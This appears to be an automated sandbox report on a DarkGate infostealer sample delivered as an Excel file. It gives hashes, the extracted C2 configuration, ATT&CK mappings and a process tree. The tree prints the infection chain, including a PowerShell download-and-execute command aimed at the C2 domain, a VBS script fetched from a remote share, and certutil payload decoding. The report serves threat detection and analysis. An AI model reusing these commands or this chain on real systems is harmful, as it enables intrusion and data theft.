darkgate | 8b170beb34d161b7991fad512708e86d76f61966b97b06c25f2fa63ca1e85aaa

General

Target

8b170beb34d161b7991fad512708e86d76f61966b97b06c25f2fa63ca1e85aaa.xlsx
Size

60KB
MD5

ac17fd450a0951be064e074ba95bb35a
SHA1

d3fc019079761d0228f802f6d54314b093587c98
SHA256

8b170beb34d161b7991fad512708e86d76f61966b97b06c25f2fa63ca1e85aaa
SHA512

b8461a875edaa6e7a3e8c865f7c376d84303643d1a3c6a9bb8c165ed7c093bdbfa3208be3f70c7292ff1d4b2ebe69ac099dcfb6f1592f1ec6f217ee50932983d
SSDEEP

1536:cIN5DGhJDl5eZ9l0ohOplRfzDrtw86RUtdP:cI3ChJR0vl0ohYlRfzD/6oF

Score

10^/10

darkgate admin888 stealer

Malware Config

Extracted

Family

darkgate

Botnet

admin888

C2

adfhjadfbjadbfjkhad44jka.com

Attributes

anti_analysis
true
anti_debug
false
anti_vm
true
c2_port
80
check_disk
false
check_ram
false
check_xeon
false
crypter_au3
false
crypter_dll
false
crypter_raw_stub
false
internal_mutex
zpQpPwKm
minimum_disk
50
minimum_ram
7000
ping_interval
6
rootkit
false
startup_persistence
true
username
admin888

Signatures

DarkGate
DarkGate is an infostealer written in C++.
stealer darkgate

Detect DarkGate stealer 2 IoCs

resource	yara_rule
behavioral2/memory/3416-57-0x0000000004AE0000-0x0000000004B52000-memory.dmp	family_darkgate_v6
behavioral2/memory/3416-59-0x0000000004AE0000-0x0000000004B52000-memory.dmp	family_darkgate_v6

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	3796	3588	WScript.exe	94

Blocklisted process makes network request 4 IoCs

flow	pid	Process
50	1688	powershell.exe
54	1688	powershell.exe
60	1688	powershell.exe
61	1688	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 1 IoCs

pid	Process
3416	AutoHotkey.exe

Drops desktop.ini file(s) 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Videos\Captures\desktop.ini	svchost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 7 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	svchost.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AutoHotkey.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	AutoHotkey.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1904519900-954640453-4250331663-1000\{0B8D06DD-A3F3-4710-86C1-57123627AC79}	svchost.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
3588	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
1688	powershell.exe
1688	powershell.exe
1688	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1688	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
3588	EXCEL.EXE
3588	EXCEL.EXE

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
3588	EXCEL.EXE
3588	EXCEL.EXE
3588	EXCEL.EXE
3588	EXCEL.EXE
3588	EXCEL.EXE
3588	EXCEL.EXE
3588	EXCEL.EXE
3588	EXCEL.EXE
3588	EXCEL.EXE
3588	EXCEL.EXE
3588	EXCEL.EXE
3588	EXCEL.EXE

Suspicious use of WriteProcessMemory 11 IoCs

description	pid	Process	procid_target
PID 3588 wrote to memory of 3796	3588	EXCEL.EXE	105
PID 3588 wrote to memory of 3796	3588	EXCEL.EXE	105
PID 3796 wrote to memory of 1688	3796	WScript.exe	106
PID 3796 wrote to memory of 1688	3796	WScript.exe	106
PID 1688 wrote to memory of 1896	1688	powershell.exe	109
PID 1688 wrote to memory of 1896	1688	powershell.exe	109
PID 1688 wrote to memory of 3416	1688	powershell.exe	110
PID 1688 wrote to memory of 3416	1688	powershell.exe	110
PID 1688 wrote to memory of 3416	1688	powershell.exe	110
PID 1688 wrote to memory of 2532	1688	powershell.exe	111
PID 1688 wrote to memory of 2532	1688	powershell.exe	111

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2532	attrib.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\8b170beb34d161b7991fad512708e86d76f61966b97b06c25f2fa63ca1e85aaa.xlsx"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3588
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "\\5.252.177.213\share\EXCEL_OPEN_DOCUMENT.PDF.vbs"
  2⤵
  - Process spawned unexpected child process
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:3796
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri 'adfhjadfbjadbfjkhad44jka.com/dekcbnwq')
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1688
  - - C:\Windows\system32\certutil.exe
      "C:\Windows\system32\certutil.exe" -decodehex a.bin AutoHotkey.exe
      4⤵
      PID:1896
  - - C:\st\AutoHotkey.exe
      "C:\st\AutoHotkey.exe" script.ahk
      4⤵
      Executes dropped EXE
      Checks processor information in registry
      PID:3416
  - - C:\Windows\system32\attrib.exe
      "C:\Windows\system32\attrib.exe" +h C:/st
      4⤵
      Views/modifies file attributes
      PID:2532

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=2700 --field-trial-handle=2264,i,13734085038406049477,12426093271221802693,262144 --variations-seed-version /prefetch:8
1⤵
PID:4932

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService
1⤵
- Drops desktop.ini file(s)
- Checks processor information in registry
- Modifies registry class
PID:1332

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

1

T1564

Hidden Files and Directories

1

T1564.001

Credential Access

Discovery

Query Registry

3

T1012

System Information Discovery

4

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_igmjjf5l.5hq.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Videos\Captures\desktop.ini

Filesize
190B

MD5
b0d27eaec71f1cd73b015f5ceeb15f9d

SHA1
62264f8b5c2f5034a1e4143df6e8c787165fbc2f

SHA256
86d9f822aeb989755fac82929e8db369b3f5f04117ef96fd76e3d5f920a501d2

SHA512
7b5c9783a0a14b600b156825639d24cbbc000f5066c48ce9fecc195255603fc55129aaaca336d7ce6ad4e941d5492b756562f2c7a1d151fcfc2dabac76f3946c

Download Submit
C:\st\AutoHotkey.exe

Filesize
892KB

MD5
a59a2d3e5dda7aca6ec879263aa42fd3

SHA1
312d496ec90eb30d5319307d47bfef602b6b8c6c

SHA256
897b0d0e64cf87ac7086241c86f757f3c94d6826f949a1f0fec9c40892c0cecb

SHA512
852972ca4d7f9141ea56d3498388c61610492d36ea7d7af1b36d192d7e04dd6d9bc5830e0dcb0a5f8f55350d4d8aaac2869477686b03f998affbac6321a22030

Download Submit
C:\st\a.bin

Filesize
1.7MB

MD5
bf88d228baec74c7928df463db0f0fdc

SHA1
efe1657bb9a9a31742b71d8c14bae89b2ab5533b

SHA256
493099b55ea0da872d3b9855c5a60752833e737be547ebc5328caea2bf0542ed

SHA512
c247a0dbba9971a8949729f888a4d8b10ca188b6fabedb9d1fe9cc7907cc4d807e66f3367ca287bf1e4062c342cbb7a724a9cc168018f55bc187e04897c8bdfa

Download Submit
C:\st\script.ahk

Filesize
49KB

MD5
f1c7fc2ffe233c956f7adfea4acdfdac

SHA1
82314962946c1e712a42b9900fdfaf479376e343

SHA256
11667b53618af41795c53fec397e9a76799b1ca0d3c3dc1f7ea2da9feb1394c9

SHA512
7a6335e5bfec788eefbc8bf9b4624002910db386cb50f291e15b2e36c91a7177557b1b50a840486b5d3261b6ea41a29f2e923e37e72a063914efeeadb6ac6339

Download Submit
C:\st\test.txt

Filesize
906KB

MD5
6325253aa2fa1087076b1bb73ad18475

SHA1
5b590d7f5ede4bdcd4f16f00ff699dbcac53a239

SHA256
debfa94dc0c7ad0f40c3c9097272620bcd93cf32f8a1d7143d9067074372faba

SHA512
c2595a939b8ee3c2a22e321703d2876c612f65281bd5b8789af3023adea8109685cc5a70e49cc5f7dd1755f89ee3d316d35620b013f8c940216a4d53199a4973

Download Submit
memory/1688-43-0x00000225EDDD0000-0x00000225EDF92000-memory.dmp

Filesize
1.8MB

Download
memory/1688-54-0x00007FFB22FE0000-0x00007FFB23AA1000-memory.dmp

Filesize
10.8MB

Download
memory/1688-29-0x00000225ED670000-0x00000225ED692000-memory.dmp

Filesize
136KB

Download
memory/1688-41-0x00000225D4F80000-0x00000225D4F90000-memory.dmp

Filesize
64KB

Download
memory/1688-42-0x00000225D4F80000-0x00000225D4F90000-memory.dmp

Filesize
64KB

Download
memory/1688-40-0x00000225D4F80000-0x00000225D4F90000-memory.dmp

Filesize
64KB

Download
memory/1688-39-0x00007FFB22FE0000-0x00007FFB23AA1000-memory.dmp

Filesize
10.8MB

Download
memory/3416-57-0x0000000004AE0000-0x0000000004B52000-memory.dmp

Filesize
456KB

Download
memory/3416-59-0x0000000004AE0000-0x0000000004B52000-memory.dmp

Filesize
456KB

Download
memory/3588-16-0x00007FFB50170000-0x00007FFB50365000-memory.dmp

Filesize
2.0MB

Download
memory/3588-44-0x00007FFB50170000-0x00007FFB50365000-memory.dmp

Filesize
2.0MB

Download
memory/3588-15-0x00007FFB0E030000-0x00007FFB0E040000-memory.dmp

Filesize
64KB

Download
memory/3588-14-0x00007FFB50170000-0x00007FFB50365000-memory.dmp

Filesize
2.0MB

Download
memory/3588-12-0x00007FFB0E030000-0x00007FFB0E040000-memory.dmp

Filesize
64KB

Download
memory/3588-13-0x00007FFB50170000-0x00007FFB50365000-memory.dmp

Filesize
2.0MB

Download
memory/3588-11-0x00007FFB50170000-0x00007FFB50365000-memory.dmp

Filesize
2.0MB

Download
memory/3588-10-0x00007FFB50170000-0x00007FFB50365000-memory.dmp

Filesize
2.0MB

Download
memory/3588-9-0x00007FFB50170000-0x00007FFB50365000-memory.dmp

Filesize
2.0MB

Download
memory/3588-0-0x00007FFB101F0000-0x00007FFB10200000-memory.dmp

Filesize
64KB

Download
memory/3588-8-0x00007FFB50170000-0x00007FFB50365000-memory.dmp

Filesize
2.0MB

Download
memory/3588-7-0x00007FFB50170000-0x00007FFB50365000-memory.dmp

Filesize
2.0MB

Download
memory/3588-5-0x00007FFB101F0000-0x00007FFB10200000-memory.dmp

Filesize
64KB

Download
memory/3588-6-0x00007FFB50170000-0x00007FFB50365000-memory.dmp

Filesize
2.0MB

Download
memory/3588-4-0x00007FFB101F0000-0x00007FFB10200000-memory.dmp

Filesize
64KB

Download
memory/3588-3-0x00007FFB50170000-0x00007FFB50365000-memory.dmp

Filesize
2.0MB

Download
memory/3588-2-0x00007FFB101F0000-0x00007FFB10200000-memory.dmp

Filesize
64KB

Download
memory/3588-1-0x00007FFB101F0000-0x00007FFB10200000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads